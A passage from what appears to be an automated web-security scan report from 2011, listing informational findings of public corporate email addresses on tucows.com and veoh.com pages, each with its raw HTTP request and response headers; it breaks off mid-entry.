X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<a href="mailto:kristal@butterscotch.com">kristal@butterscotch.com</a>
...[SNIP]...

23.153. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<a href="mailto:developer@tucows.com">developer@tucows.com</a>
...[SNIP]...

23.154. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<a href="mailto:reseller.support@tucows.com">reseller.support@tucows.com</a>
...[SNIP]...
<a href="mailto:sales@opensrs.org">sales@opensrs.org</a>
...[SNIP]...

23.155. http://www.veoh.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=74
Content-Length: 50459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.156. http://www.veoh.com/browse/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/groups HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=28
Content-Length: 71827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.157. http://www.veoh.com/browse/groups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/groups/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=66
Content-Length: 71825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.158. http://www.veoh.com/browse/movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.159. http://www.veoh.com/browse/movies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/movies/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:42:20 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.160. http://www.veoh.com/browse/music  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/music HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.161. http://www.veoh.com/browse/music/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/music/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/music/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 69925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.162. http://www.veoh.com/browse/tvshows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/tvshows HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=54
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.163. http://www.veoh.com/browse/tvshows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/tvshows/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.164. http://www.veoh.com/browse/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:30:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=57
Content-Length: 116662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.165. http://www.veoh.com/browse/videos/category/action_adventure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 115983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.166. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.167. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
